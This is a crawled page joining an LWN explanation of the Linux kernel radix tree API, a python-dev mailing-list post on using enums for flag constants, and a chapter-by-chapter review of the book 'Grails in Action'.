tracks in-core pages tied to that mapping. Among other things, this tree
allows the memory management code to quickly find pages which are dirty or
under writeback.
As is typical with kernel data structures, there are two modes for
declaring and initializing radix trees:
#include <linux/radix-tree.h>
RADIX_TREE(name, gfp_mask); /* Declare and initialize */
struct radix_tree_root my_tree;
INIT_RADIX_TREE(my_tree, gfp_mask);
The first form declares and initializes a radix tree with the given
name; the second form performs the initialization at run time. In
either case, a gfp_mask must be provided to tell the code how
memory allocations are to be performed. If radix tree operations
(insertions, in particular) are to be performed in atomic context, the
given mask should be GFP_ATOMIC.
The functions for adding and removing entries are straightforward:
int radix_tree_insert(struct radix_tree_root *tree, unsigned long key,
void *item);
void *radix_tree_delete(struct radix_tree_root *tree, unsigned long key);
A call to radix_tree_insert() will cause the given item
to be inserted (associated with key) in the given tree. This
operation may require memory allocations; should an allocation fail, the
insertion will fail and the return value will be -ENOMEM. The
code will refuse to overwrite an existing entry; if key already
exists in the tree, radix_tree_insert() will return
-EEXIST. On success, the return value is zero.
radix_tree_delete() removes the item associated with key
from tree, returning a pointer to that item if it was present.
There are situations where failure to insert an item into a radix tree can
be a significant problem. To help avoid such situations, a pair of specialized
functions are provided:
int radix_tree_preload(gfp_t gfp_mask);
void radix_tree_preload_end(void);
This function will attempt to allocate sufficient memory (using the given
gfp_mask) to guarantee that the next radix tree insertion cannot
fail. The allocated structures are stored in a per-CPU variable, meaning
that the calling function must perform the insertion before it can schedule
or be moved to a different processor. To that end,
radix_tree_preload() will, when successful, return with preemption
disabled; the caller must eventually ensure that preemption is enabled
again by calling radix_tree_preload_end(). On failure,
-ENOMEM is returned and preemption is not disabled.
Radix tree lookups can be done in a few ways:
void *radix_tree_lookup(struct radix_tree_root *tree, unsigned long key);
void **radix_tree_lookup_slot(struct radix_tree_root *tree, unsigned long key);
unsigned int radix_tree_gang_lookup(struct radix_tree_root *root,
void **results,
unsigned long first_index,
unsigned int max_items);
The simplest form, radix_tree_lookup(), looks for key in
the tree and returns the associated item (or NULL on
failure). radix_tree_lookup_slot() will, instead, return a
pointer to the slot holding the pointer to the item. The caller can, then,
change the pointer to associate a new item with the key. If the
item does not exist, however, radix_tree_lookup_slot() will not
create a slot for it, so this function cannot be used in place of
radix_tree_insert().
Finally, a call to radix_tree_gang_lookup() will return up to
max_items items in results, with ascending key values
starting at first_index. The number of items returned may be less
than requested, but a short return (other than zero) does not imply that
there are no more values in the tree.
One should note that none of the radix tree
functions perform any sort of locking internally. It is up to the caller
to ensure that multiple threads do not corrupt the tree or get into other
sorts of unpleasant race conditions. Nick Piggin currently has a patch
circulating which would use read-copy-update to free tree nodes; this patch
would allow lookup operations to be performed without locking as long as
(1) the resulting pointer is only used in atomic context, and
(2) the calling code avoids creating race conditions of its own. It
is not clear when that patch might be merged, however.
The radix tree code supports a feature called "tags," wherein specific bits
can be set on items in the tree. Tags are used, for example, to mark
memory pages which are dirty or under writeback. The API for working with
tags is:
void *radix_tree_tag_set(struct radix_tree_root *tree,
unsigned long key, int tag);
void *radix_tree_tag_clear(struct radix_tree_root *tree,
unsigned long key, int tag);
int radix_tree_tag_get(struct radix_tree_root *tree,
unsigned long key, int tag);
radix_tree_tag_set() will set the given tag on the item
indexed by key; it is an error to attempt to set a tag on a
nonexistent key. The return value will be a pointer to the tagged item.
While tag looks like an arbitrary integer, the
code as currently written allows for a maximum of two tags. Use of any tag
value other than zero or one will silently corrupt memory in some
undesirable place; consider yourself warned.
Tags can be removed with radix_tree_tag_clear(); once again, the
return value is a pointer to the (un)tagged item. The function
radix_tree_tag_get() will check whether the item indexed by
key has the given tag set; the return value is zero if
key is not present, -1 if key is present but tag
is not set, and +1 otherwise. This function is currently commented out in
the source, however, since no in-tree code uses it.
There are two other functions for querying tags:
int radix_tree_tagged(struct radix_tree_root *tree, int tag);
unsigned int radix_tree_gang_lookup_tag(struct radix_tree_root *tree,
void **results,
unsigned long first_index,
unsigned int max_items,
int tag);
radix_tree_tagged() returns a non-zero value if any item in the
tree bears the given tag. A list of items with a given tag can be
obtained with radix_tree_gang_lookup_tag().
In concluding, we can note one other interesting aspect of the radix tree
API: there is no function for destroying a radix tree. It is, evidently,
assumed that radix trees will last forever. In practice, deleting all
items from a radix tree will free all memory associated with it other than
the root node, which can then be disposed of normally.
Node size and cache-line ping pong on SMP
Posted Mar 17, 2006 21:27 UTC (Fri) by im14u2c (subscriber, #5246)
[Link]
Trees I: Radix trees
Posted Mar 19, 2006 8:09 UTC (Sun) by ncm (subscriber, #165)
[Link]
Posted Jun 30, 2006 23:22 UTC (Fri) by wahern (subscriber, #37304)
[Link]
Source:
Simplicity is often a very valuable quality, especially in software development.
Judy licensing
Posted Jul 18, 2007 7:59 UTC (Wed) by iler (guest, #46313)
[Link]
Is Judy GPLed ?
Posted Oct 23, 2008 21:31 UTC (Thu) by bcl (guest, #17631)
[Link]
Linux is a registered trademark of Linus Torvalds | http://lwn.net/Articles/175432/ | crawl-002 | refinedweb | 1,428 | 65.96 |
On 09/11/2017 03:28 PM, Guido van Rossum wrote: > Oddly I don't like the enum (flag names get too long that way), but I do agree with everything else Barry said (it > should be a trivalue flag and please don't name it cmp). Hmmm, named constants are one of the motivating factors for having an Enum type. It's easy to keep the name a reasonable length, however: export them into the module-level namespace. re is an excellent example; the existing flags were moved into a FlagEnum, and then (for backwards compatibility) aliased back to the module level: class RegexFlag(enum.IntFlag): ASCII = sre_compile.SRE_FLAG_ASCII # assume ascii "locale" IGNORECASE = sre_compile.SRE_FLAG_IGNORECASE # ignore case LOCALE = sre_compile.SRE_FLAG_LOCALE # assume current 8-bit locale UNICODE = sre_compile.SRE_FLAG_UNICODE # assume unicode "locale" MULTILINE = sre_compile.SRE_FLAG_MULTILINE # make anchors look for newline DOTALL = sre_compile.SRE_FLAG_DOTALL # make dot match newline VERBOSE = sre_compile.SRE_FLAG_VERBOSE # ignore whitespace and comments A = ASCII I = IGNORECASE L = LOCALE U = UNICODE M = MULTILINE S = DOTALL X = VERBOSE # sre extensions (experimental, don't rely on these) TEMPLATE = sre_compile.SRE_FLAG_TEMPLATE # disable backtracking T = TEMPLATE DEBUG = sre_compile.SRE_FLAG_DEBUG # dump pattern after compilation globals().update(RegexFlag.__members__) So we can still do re.I instead of re.RegexFlag.I. Likewise, if we had: class Compare(enum.Enum): NONE = 'each instance is an island' EQUAL = 'instances can be equal to each other' ORDERED = 'instances can be ordered and/or equal' globals().update(Compare.__members__) then we can still use, for example, EQUAL, but get the more informative repr and str when we need to. -- ~Ethan~ | https://mail.python.org/pipermail/python-dev/2017-September/149604.html | CC-MAIN-2020-16 | refinedweb | 261 | 50.73 |
Hello,
Normally I work/play with microcontrollers from Microchip, but for my thesis I have to use Arduino, so we got ourselves an Arduino board MEGA 2560 in school.
Easy peasy I thought, download the software, plug the board in through a USB cable, the green light lits so I figure it's working. THEN after even less than a second, the chip gets EXTREMELY HOT! (Nothing is even plugged in yet, so no huge currents drawn)
Hi,
My question is if it is possible to estimate or calculate the time a µcontroller needs in order to execute a few commands. I'm trying to get exactly 1 second that a whole series of commands take, something like this (programmed in C):
while(j<time){
//several commands..
}.
Hello!
So I've made a topic in the MPLAB section, but no one seemed to answer, so I thought, maybe it belongs in here, since I'm pretty newb at the moment.
Situation:
I bought a PCKit2 and looked at the 12 examples, they're pretty neat. But I would like to learn to program the PIC's in C-language.
I have found a guide on the MPLAB CD-ROM that came with this PICKit2, but it doesn't seem to work.
Then I've tried a tutorial on the internet, and here's what that gave me:
I've just made a source file with just a small main like this (using a PIC16F690):
So I've got myself this PICKit2 and looked at the 12 examples in the guide, but I'm wondering how to program in C instead of assembler language, because of having more experience with C-like language than with assembler language.
I've found a tutorial on the internet, but it's from an older version of MPLAB, so I can't follow too much with the settings being different.
#include <p16F690.h>void main(){}
So I've tried making an alarm clock robot from the LMR First Robot, and it works kind off, so I'll try to make it look more sophisticated. Now it just looks like a speaker and batteries on a plate with some wires, here's what I'm thinking of doing with it (don't think thats proper english, hmm):
So it'll have 2 wheels+electromotor, 1 on each side, a 7-LED Display, 4 buttons to adjust the timer, and 1 to shut off the alarm. The frame should be transparent, so I can put some blue LED's in it.
So I'm trying to adapt my robot to make a wake up robot, that makes an alarm, and as soon as the alarm starts, he starts driving so u have to get up to shut him off.
Search page | http://letsmakerobots.com/user/18940/pages | CC-MAIN-2014-10 | refinedweb | 464 | 67.72 |
The for loop executes a given code block multiple times. It simplifies the loop process when we need to repeat the body a fixed number of times. It handles the iterations, using three statements: initialization ; condition ; update.
As you see, “for” is a pre-condition loop. The first thing that is executed in a for loop is the initialization statement. Then the condition is checked and if it is true the body is executed. After the body follows the update statement and then the condition.
The iterations continue until the condition is evaluated to false. We can represent the logic like this:
Initialization – (Condition – Body – Update)
The statements in the parenthesis will execute for each repetition of the loop.
for(initialization
; condition ; update)
{
Body of the loop
}
Note that all of these statements (excluding the body) are optional. If you choose to omit some of them, you still need to add the semicolon. In fact, one common way to write an infinite loop in C is:
for(;;)
{
}
This is the first part that is executed. It is executed only once. Usually here, we will initialize an int variable.
for (i = 0 ; …)
We can initialize more than one variable, separating them with commas.
for (i = 0, j = 1 ; …)
Note that the variables i and j were created before the loop. Before the C99 standard, it was not allowed to create a variable at this place. If your compiler complies with C99 or later, you can create and initialize the variable in the loop like this:
for(int i = 1; ...)
When you create a variable in this manner, its scope is limited to the for loop – its initialization, condition, update and body. Once the program leaves the loop that variable is out of scope and you cannot access it anymore.
The condition statement executes with each iteration, just before the body block. In theory, you can place here any statement that returns any result. In practice here we compare our counting variable to the target number of executions.
for(...; i < 10; ...)
If you omit the condition, it is always evaluated to true.
The update statement executes with each iteration, right after the body block. In theory here you can put any valid C statement. Normally, we just increment or decrement our counter variable(s).
for(...; ...; i++)
We can also increment by a different step, by a factor or even use an entire expression.
The classic use:
#include <stdio.h>
int main()
{
int i;
for(i = 1; i <= 10; i++)
{
printf("%d ", i);
}
}
This simple example will print the numbers for 1 to 10. The actual output of the program is:
“1 2 3 4 5 6 7 8 9 10”
Different increment step:
Write a function that sums all even numbers between 9 and 31. In this case we don’t need to iterate over the odd numbers. That’s why we use an increment step of 2, starting from the first even number in the interval:
int
sumEvens()
{
int i = 10;
int sum = 0;
for(; i < 31; i = i + 2)
{
sum += i;
}
return sum;
}
Different increment step:
Create a program in C that reads a sequence of numbers and finds the biggest of them. The first input tells how many numbers we need to read and compare. Use a for loop.
void
findMax()
{
int count, i, currentNumber, max;
printf("How many numbers do you want to compare? ");
scanf("%d", &count);
scanf("%d", &max);
for(i = count; i > 1; i--)
{
scanf("%d", &tNumber);
if(currentNumber > max)
max = currentNumber;
}
printf("The biggest number is %d\n", max);
}
Here are all the examples in a zip file. It contains one source file with all the above examples.
See also:
This article is part of two tutorials: Basic C tutorial and keywords in C. Continue accordingly: | http://www.c-programming-simple-steps.com/for-loop.html | CC-MAIN-2017-39 | refinedweb | 631 | 72.46 |
Introduction
AllegroGraph supports creating free text indices using Apache Solr, which we describe in this document.
Note that freetext indexing is orthogonal to triple indices like spogi. Freetext indices let you quickly map from words and phrases to triples; triple indices let you quickly find triples that match particular patterns.
Other free text indexers in AllegroGraph
There is also a native free text indexer, described in Free Text Indices.
Text indexing with Apache Solr
Apache Solr is an open-source freetext indexing/searching platform from the Apache Lucene project. Lucene is a Java Based Freetext Indexer with many many features. Solr is an XML database wrapper around Lucene.
Apache Solr is described on the following website: lucene.apache.org/solr/.
Should you use the Solr indexer or the native AllegroGraph text indexer?
The native free text indexer, described (as said above) in Free Text Indices, is sufficient for many purposes and has these advantages:
It is generally faster.
It has a simpler API (Solr runs as a separate program which must communicate with AllegroGraph).
You must keep Solr and AllegroGraph in sync. That is automatic with the native indexer.
But because Solr is a public project with many users and many contributers, it has many features which are not in the AllegroGraph native free text indexer. Further, it is constantly being enhanced.
Solr supports:
Many languages
Very flexible pipe line architecture for tokenizers, stemmers, etc.
External file-based configuration of stopword lists, synonym lists, and protected word lists
Relevancy ranking and word boosting *
Finding words close together *
Faceted Search *
Text clustering *
Hit highlighting *
The bullets marked with stars are Solr features not in the native free text indexer.
Installing Apache Solr
Because it is a separate application, AllegroGraph itself does not start the Apache Solr application.
Further, the application itself is not part of the AllegroGraph distribution.
Before using Solr to create indices and do searches, please download and install Solr (which again, is not a Franz Inc. product) as described on the Apache Solr website.
In the rest of this document, we assume you have the Solr server installed and running on your computer.
Important notes on running Solr with AllegroGraph
Please note the following:
The Solr database needs to be populated. Adding triples to a triple store does not automatically adds records to Solr. Nor does deleting triples delete records from Solr.
The Solr database needs to have a field that contains an integer document id. You may use triple ids for it, or you may use your own numberings, and insert
(subject !<> document-id)
into the triple store to establish the association of the document id with the subject.
document-id must be of type
xsd:long.
Settings for Solr
Two database metadata values have been added to keep the information needed to connect to the Solr server:
solr-endpoint : the URL of the solr server.
solr-id-field : the name of the solr field that contains docid.
These can be set and retrieved with the following Lisp functions:
Returns the current Solr connection parameters in a plist.
Currently it contains two items:
- :endpoint to specify Solr server endpoint.
- :id-field to specify the Solr field name that contains document id.
Set Solr connection parameters.
You can set either :endpoint or :id-field, or both.
These parameters can also be set in AGWebView.
Solr usage
There are two new prolog functions:
- solrid
?id ?query [?howmany]
Search the Solr database with ?query, and unify the docid to ?id. ?howmany limits the max number of matches. Its default is 100. The query is parsed by the Solr server, so you can use the syntax supported by it. Multiple words are regarded as an OR search (by default---it depends on the Solr server config). The keyword AND can be used for 'and' condition, and parentheses can be used for grouping. See the Solr documentation for more details.
- solr-text
?s ?query [?howmany]
After obtaining Solr docids by solrid, this unifies them to:
(q ?s !<> ?id))
The following Lisp function is exported from the db.agrpah.query.solr package:
- get-ids-from-solr-query
(query &optional (howmany 100))
Issue QUERY to the external Solr server, retrieve the document ids and return them as a list of integers. Solr connection parameters need to be set up by set-solr-parameters before calling this function.
Solr example
Here is a simple example. It is difficult to anticipate all the ways the Solr interface will be used and the setup can differ quite a lot depending on what the application wants to index. And there is great flexibility in setting up the Solr schema, and determining what is a valid Solr query depends on how the Solr schema is set up.
The Solr schema defines what kind of information is stored for each document. AllegroGraph requires that the schema at least contain a field which contains a unique number to identify the document.
Download the latest version of Solr if you have not already done so. We assume the variable $SOLR is the directory into which the Solr distribution was extracted.
Open $SOLR/example/solr/conf/schema.xml with an editor. Find the <fields> element and replace its body with the following field elements:
- In the $SOLR/example directory, run the Solr server.
java -Djetty.port=8983 -jar start.jar
- From AGWebView, go to a repository page. In the bottom of the "Store Control" list you will find a link "Manage external Solr free-text indexer". Clicking it brings you to the "External Solr free-text indexer setting" screen:
<field name="id" type="string" indexed="true" stored="true" required="true" /> <field name="predicate" type="string" indexed="true" stored="true"/> <field name="text" type="text_general" indexed="true" stored="true"/>
In this case, the 'id' field serves to identify the document. We'll also index the predicate part as the 'predicate' field, and both the object and the subject parts as 'text' fields.
It is also necessary to comment out the copyField elements.
The jetty.port parameter specifies the TCP port number on which the Solr server will listen. If you need to run multiple Solr servers on one machine, choose different port numbers for each. (Solr can only have a single repository per server, so you need multiple servers if you want to serve more than one repository).
This command runs the server in foreground, with tons of debugging messages to stdout. You may want to run redirect its output elsewhere and/or put the java process background, e.g.
(java -Djetty.port=8983 -jar start.jar > /dev/null 2>&1)&
For further customization of Solr server, please consult the Solr documentation.
Type "" in "Solr endpoint url" box. Adjust the port number to match the number you used for the jetty.port parameter when you started the Solr server. The "Document id field name" box specifies the Solr field name to be used as the unique document ID. We set it up as "id" in step 3 above, so you can leave it as "id". Click the "Set" button to save the settings.
Now you can query Solr from AllegroGraph's prolog or Lisp interface. However, in the beginning, the Solr database is empty. You need to populate it.
AllegroGraph does not handle insert/update/delete operations on the Solr database, since it needs a separate commit from AllegroGraph's own commit. You can use Solr's REST HTTP API, or one of their language bindings, to populate the Solr database. The AllegroGraph Lisp client also has a Solr binding. The Lisp code solr-example.cl, below, shows one way to insert data into Solr as well as adding triples to AllegroGraph.
Once the Solr database is populated, you can issue a prolog query using solrid/2. For example, the following query returns a list of characters whose line contains "good".
(select (?s) (solrid ?id "good") (q ?s !<> ?id))
(You can also use the predicate
solr-text. It essentially combines both clauses into one, so
(select (?s) (solr-text ?s "good")) has the same effect as the query above.)
By default, space-separated words in a Solr query means OR. So the following query returns the doc ids that contain either "good" or "him" or both in their indexed parts:
(select (?id) (solrid ?id "good him"))
while the following returns doc ids whose indexed parts contain both "good" and "him" but not those that contain "good" but not "him" or "him" but not "good":
(select (?id) (solrid ?id "good AND him"))
Please consult the Solr documentation for advanced queries. The solrid and solr-text functions pass the query string to Solr as-is, and it's up to the Solr engine to interpret it. There is great flexibility on the Solr side to customize how the query string should be parsed.
solr-example.cl
In many browsers, the long lines will look truncated but the text will cut and paste correctly.
;; -*-mode:common-lisp, package:db.agraph.user-*- (in-package :db.agraph.user) (eval-when (compile load eval) (enable-!-reader)) (register-namespace "names" "") (register-namespace "actions" "") (register-namespace "fi" "") (defvar *solr-endpoint* "") (defvar *solr-test-data* '(("Master" "Boatswain!") ;1 ("Boatswain" "Here, master: what cheer?") ;3 ("Master" "Good, speak to the mariners: fall to't, yarely,or we run ourselves aground: bestir, bestir.") ;5 ("Boatswain" "Heigh, my hearts! cheerly, cheerly, my hearts! yare, yare! Take in the topsail. Tend to the master's whistle. Blow, till thou burst thy wind, if room enough!") ;7 ("ALONSO" "Good boatswain, have care. Where's the master? Play the men.") ;9 ("Boatswain" "I pray now, keep below.") ;11 ("ANTONIO" "Where is the master, boatswain?") ;13 ("Boatswain" "Do you not hear him? You mar our labour: keep your cabins: you do assist the storm.") ;15 ("GONZALO" "Nay, good, be patient.") ;17 ("Boatswain" "When the sea is. Hence! What cares these roarers for the name of king? To cabin: silence! trouble us not.") ;19 ("GONZALO" "Good, yet remember whom thou hast aboard.") ;21 (.") ;23 (.") ;25 ("Boatswain" "Down with the topmast! yare! lower, lower! Bring her to try with main-course. A cry within A plague upon this howling! they are louder than the weather or our office.") ;27 ("Boatswain" "Yet again! what do you here? Shall we give o'er and drown? Have you a mind to sink?") ;29 ("SEBASTIAN" "A pox o' your throat, you bawling, blasphemous, incharitable dog!") ;31 ("Boatswain" "Work you then.") ;33 ("ANTONIO" "Hang, cur! hang, you whoreson, insolent noisemaker! We are less afraid to be drowned than thou art.") ;35 ("GONZALO" "I'll warrant him for drowning; though the ship were no stronger than a nutshell and as leaky as a sieve.") ;37 ("Boatswain" "Lay her a-hold, a-hold! set her two courses off to sea again; lay her off.") ;39 ("Mariners" "All lost! to prayers, to prayers! all lost!") ;41 ("Boatswain" "What, must our mouths be cold?") ;43 ("GONZALO" "The king and prince at prayers! let's assist them,For our case is as theirs.") ;45 ("SEBASTIAN" "I'm out of patience.") ;47 ("ANTONIO" "We are merely cheated of our lives by drunkards: This wide-chapp'd rascal--would thou mightst lie drowning The washing of ten tides!") ;49 ("GONZALO" "He'll be hang'd yet,Though every drop of water swear against it And gape at widest to glut him.") ;51 ("ANTONIO" "Let's all sink with the king.") ;53 ("SEBASTIAN" "Let's take leave of him.") ;55 ("GONZALO" "Now would I give a thousand furlongs of sea for an acre of barren ground, long heath, brown furze, any thing. The wills above be done! but I would fain die a dry death."))) (defun add-test-data () (let ((solr (make-instance 'solr:solr :uri *solr-endpoint*))) (labels ((insert (s p o) (let ((id (add-triple (resource s "names") (resource p "actions") (literal o)))) (format t "Adding #~a~%" id) (add-triple (resource s "names") !fi:solrDocId (value->upi id :long)) (solr:solr-add solr `((:id . ,(write-to-string id)) (:predicate . ,p) (:text . ,o)))))) (loop for (s o) in *solr-test-data* do (insert s "says" o)) (commit-triple-store) (solr:solr-commit solr)) (format t "Added ~s records~%" (length *solr-test-data*)))) ;; execute these two forms to run the example: ;;(create-triple-store "solr-example") ;;(add-test-data)
Solr and SPARQL 1.1
Assuming that you have setup Apache Solr with an AllegroGraph triple-store, you can query it using the SPARQL 1.1 query engine.
There are two storage strategies. In the first, you add a triple that associates the text with a Solr document ID. For example, if you have a triple like
-subject- somePredicate "Text you want to index" .
Then you would add a triple like:
-subject- <> -ID- .
And tell Solr to associate the text of the first triple with the ID of the second.
The second strategy is applicable for clients that have access to the triple-id. Here, you tell Solr to associate the text with the triple-id directly.
To query Solr with SPARQL, you use one of the new magic predicates:
- <>
- <>
The first predicate corresponds to the indirect storage strategy; the second to the triple-id based strategy. Queries for each storage strategy are similar:
# indirect strategy prefix solr: <> prefix franz: <> select * { ?s solr:match 'medicate disastrous' . ?s franz:text ?text . ?s otherProperty ?other . } # triple-id strategy prefix solr: <> select * { ?s solr:matchId 'medicate disastrous' . ?s otherProperty ?other . }
Note that Solr queries can return many results which can cause excessive query delays. You can use the query option
solrQueryLimit to limit the number of results Solr returns. This defaults to 100 but if we wanted to only get 10 results, we could write:
prefix franzOption_solrQueryLimit: <franz:10> prefix solr: <> select * { ?s solr:match 'medicate disastrous' . ?s franz:text ?text . ?s otherProperty ?other . }
Solr and Allegro CL
Allegro CL has an interface to Solr. This interface is built into AllegroGraph. It is not part of the regular Allegro CL product but is available on the Franz Inc. Github site at. You might wish to download the Allegro CL Solr Interface documentation from that location. That documentation is not included in the AllegroGraph documentation set and is not strictly necessary to create Solr free text indices in AllegroGraph, but it might be useful for other purposes. | http://franz.com/agraph/support/documentation/current/solr-index.html | CC-MAIN-2015-22 | refinedweb | 2,377 | 67.35 |
This is a very simple C++ console application that creates a simple OpenGL window. The source code is from the book "OpenGL Programming Guide (Third Edition)." This article will explain how to download and include the GLUT library. Once you include the GLUT library, it's very simple to build and execute the code. It explains also the OpenGL code that is used in this program.
You should be able to use Visual Studio 2005 and C++. You should also have some idea about OpenGL.
Steps:
Before you even start a new project, you have to download the GLUT library. You can get the latest version from this link: GLUT 3.7.6 for Windows. Click this (glut-3.7.6-bin.zip (117 KB) ) link and download the ZIP file into your computer.
Unzip the folder, copy the glut32.dll file and paste it to C:\WINDOWS\system. Copy the glut32.lib file and paste it to this directory: C:\Program Files\Microsoft Visual Studio 8\VC\PlatformSDK\Lib. The last step is to copy the glut.h file and paste it to this directory: C:\Program Files\Microsoft Visual Studio 8\VC\PlatformSDK\Include\gl. The installation of the GLUT library files is done. However, if you using a different Windows or different Visual Studio version, the directories might be different. I'm assuming that you are using Windows Vista and Visual Studio 2005.
Create a C++ console application. You don't need a Windows application. From Visual Studio 2005, select File -> New -> Projects. Select project types Visual C++ -> Win32 and create a Win32 console application.
Type the code, build and execute. Make sure to include the <GL/glut.h >.
<GL/glut.h >
//Include files
#include <span class="code-string">"stdafx.h"</span>
#include <span class="code-keyword"><GL/glut.h ></span>
Function display(void) displays a polygon:
display(void)();
}
Function init() initialises GLUT (sets the state):
init()
void init(void)
{
//select clearing (background) color
glClearColor(0.0, 0.0, 0.0, 0.0);
//initialize viewing values
glMatrixMode(GL_PROJECTION);
glLoadIdentity();
glOrtho(0.0, 1.0, 0.0, 1.0, -1.0, 1.0);
}
Main function: make sure to change the command-line parameter _TCHAR* to char**.
_TCHAR* to char**
int _tmain(int argc, char** argv)
{
//Initialise GLUT with command-line parameters.
glutInit(&argc, argv);
//Set Display Mode
glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB);
//Set the window size
glutInitWindowSize(250,250);
//Set the window position
glutInitWindowPosition(100,100);
//Create the window
glutCreateWindow("A Simple OpenGL Windows Application with GLUT");
//Call init (initialise GLUT
init();
//Call "display" function
glutDisplayFunc(display);
//Enter the GLUT event loop
glutMainLoop();
return 0;
}
Variable or class names should be wrapped in <code> tags like this.
<code>
this
Actually, this program is a very simple OpenGL program. However, if you are new and if you don't know how to initialise the GLUT library, it might take little bit more time to compile the code.
Uploaded on 01/29. | http://www.codeproject.com/Articles/23365/A-Simple-OpenGL-Window-with-GLUT-Library?PageFlow=FixedWidth | CC-MAIN-2015-32 | refinedweb | 490 | 68.36 |
Book Review: Grails in Action
ISBN: 1933988932
Reviewer RatingsRelevance:
Readability:
Overall:
Buy it now
One Minute Bottom Line
Review
Part 1: Introducing Grails
- "Chapter 1: Grails in a hurry...":
You learn what the big ideas in Grails are: convention over configuration, agile philosophy, rock-solid foundation, scaffolding and templating, Java integration, incredible wetware, and productivity ethos.
Highlights:
- Getting started and the Hello World story, gets your feet really very wet: creating a quote of the day application. For this, you create a controller, then a view, a Grails layout, followed by a domain and actions. By the end of this first chapter, you've even integrated AJAX functionality into the application.
- Example tip from the end of the chapter: "Rapid iterations are key. The most important take-away for this chapter is that Grails fosters rapid iterations to get your application up and running in record time, and you'll have a lot of fun along the way."
- "Chapter 2: The Groovy essentials":
The obligatory chapter in Grails books to introduce newbies to Groovy. Some books put this section in the back, as an appendix, but I prefer it here. Groovy shouldn't be hidden under a bushel!
Highlights:
- Covers Groovy in a very good way, covering all the standard fare (syntactic sugar and so on), as well as the very few Java constructs that are not supported by Groovy.
- The tips at the end of this chapter are handy: Use idiomatic Groovy, Experiment, Use methods (instead of closures) where appropriate, Use explicit types in method signatures. Also, remember that Groovy isn't simply a language for Grails, but also for testing, scripting, and much more.
Part 2: Core Grails
From pages 63 to 217, you learn the structure of basic Grails applications. If the book were to contain nothing other than these pages, you'd have your money's worth.The sequence of chapters begins by spending a lot of very well spent time on the domain, followed by a chapter on the controller, with the next chapter dealing with the view. The final chapter of this part deals with testing. (Great to have that within the "Core Grails" part!) Plus, the sample application, covering various parts of several chapters, is started from the very beginning of this section.
- "Chapter 3: Modeling the domain":
Opening paragraph, reproduced here to show how reassuring and kind the tone of the whole book is: "In this chapter, we'll explore Grails' support for the data model portion of your applications, and if you're worried we'll be digging deep into outer joins, you'll be pleasantly surprised. We won't be writing a line of SQL, and you won't find any Hibernate XML mappings either. We'll be taking full advantage of the Convention over Configuration paradigm, which means less time configuring and more time getting work done."
Highlights:
- The concept of "domain-driven design" is introduced here and illustrated very well by means of an example. Validation via the constraints closure in the domain class is discussed in detail, including custom validation and cross-field validation. Also clarified are the relationships between constraints and the entries generated in the database by Grails. As also done in the Grails Refcard, 1-1, 1-m, and m-n relationships are outlined and explained in detail, again specified in the domain classes, using Groovy.
- An excellent explanation of GORM and its place in the world: "Object relational mapping (ORM) is the process of getting objects into and out of a relational database. It means that you can (mostly) be oblivious to the SQL that's happening behind the scenes. In Java applications, that role is usually handled by an ORM like Hibernate or JPA; in Grails, it's done by GORM, which takes full advantage of Grovy's dynamic typing to make data access simple."
- The validators table on page 77 would have been even better if it had been duplicated in a reference section at the end of the book. The Grails Refcard has a similar table on page 3, but without the handy examples and error properties that this table contains. However, the table in the Grails Refcard indicates that there are more validators than are shown in this book, where there is a reference to an on-line location of the complete list, which would have been better in a reference section at the end of the book.
- Example tip from the end of the chapter: "Learn the basic modeling options well. You'll spend a lot of time setting up Grails models in your future development work. Take the time to learn all the basic relationship types presented in this chapter. The test cases will give you valuable experimentation fodder."
- "Chapter 4: Putting the model to work":
A brilliant chapter. Here you learn the many ways in which the domain can be used in Grails applications, justifying the term "domain-driven design".
Highlights:
- You are shown how the UI is generated from the domain and you also learn how to customize the error messages displayed in the UI (which are shown depending on the constraints closure in the domain class). After introducing dynamic scaffolding, you're shown how to generate the files that define the scaffold, so that you can customize them.
- The dynamic finders section is very practical and you can play with the code immediately, which again underlines the power of the domain in the Grails world, since the dynamic finders are generated on the fly from the domain classes.
- The closing section on bootstrapping, for populating a database with some test data, should be an eye opener to anyone who doesn't know about this Grails feature.
- Example tip from the end of the chapter: "Use scaffolds for instant gratification and to stay motivated. Scaffolds give you a good feeling of progress and keep you focused on getting your app out the door. Also, don't be afraid of using scaffolding code for admin screens in production code."
- "Chapter 5: Controlling application flow":
The chapter on controllers. It covers—controller essentials, services, data binding, command objects, working with images, intercepting requests with filters, and custom URL mappings.
Highlights:
- Good to see services discussed in the same chapter as controllers. It took me a long time to understand the role of services, which this chapter covers well: "In this section, we'll extract all of our new-post functionality into a Grails service that we can call from anywhere we like. It will make things a whole lot tidier and more maintainable."
- This is the first point in the book where data binding is discussed. Very good job is done, as usual, starting from a code snippet and then drawing general principles from that point.
- I learned about command objects for the first time (section 5.4): "The command object's purpose is to marshal data from form parameters into a non-domain class that offers its own validation." (For example, and this is the example used here, this could be useful for validating a 'password' field with a 'confirmPassword' field.)
- Techniques for dealing with images. Brilliant and practical as always. "Handling file uploads", "Uploading to the filesystem", and "Rendering photos from the database".
- You are introduced in some detail to "/grails-app/conf/UrlMappings.groovy". "This file is where you configure rules for routing incoming requests to particular controllers and actions."
- Many very subtle techniques are discussed in this chapter. I need to spend a lot of time onall the tips and tricks here. Many new terms (would also have been good to have a terminology section at the end of the book)—flash scope, command objects, permalinks, wildcard support, filters (which you can use before/after a controller action is fired), whitelists, blacklists, and several others.
- "Chapter 6: Developing tasty views, forms, and layouts":
The chapter on views. It covers—core form tags, custom tags, delicious layouts, and AJAX tags. In other words, it goes beyond tagging, to the layout of your views, as well as the integration of JavaScript libraries to create AJAX effects.
Highlights:
- Custom tags. Section 6.2 shows how you can create custom tags to supplement those provided by Grails. You're also shown (page 167) how to change the namespace from the default g: to whatever you want it to be. (Again, practical little tip: "It's best to use short namespaces to reduce typing.")
- The discussion (6.3.1) on page decoration via SiteMesh is very interesting, showing how to set up custom page layouts. Skinning and navigation tabs are described too.
- JavaScript libraries Scriptaculous, YUI, jQuery—all are mentioned or discussed in detail, together with JSON.
- "Chapter 7: Building reliable applications":
The chapter on testing. It covers—unit testing, integration testing, and functional testing.
Highlights:
- Good introduction to testing in general, leading up to a very strong endorsement of test-driven development. Mock objects are also covered (7.2.3).
- Excellent—you are shown how to unit test each part of your Grails application. Subsections focus on (7.2.1) domain classes, (7.2.2) services, (7.2.4) controllers, and (7.2.5) tag libraries.
- The use of several tools and plugins are included—functional test plugin, Selenium, JsUnit, and fixtures.
- Example tip from the end of the chapter: "Test at all levels. We can't stress this enough: make sure that you're testing at both the unit and functional levels. Even if there is some overlap and redundancy, that's better than having gaps in your test coverage."
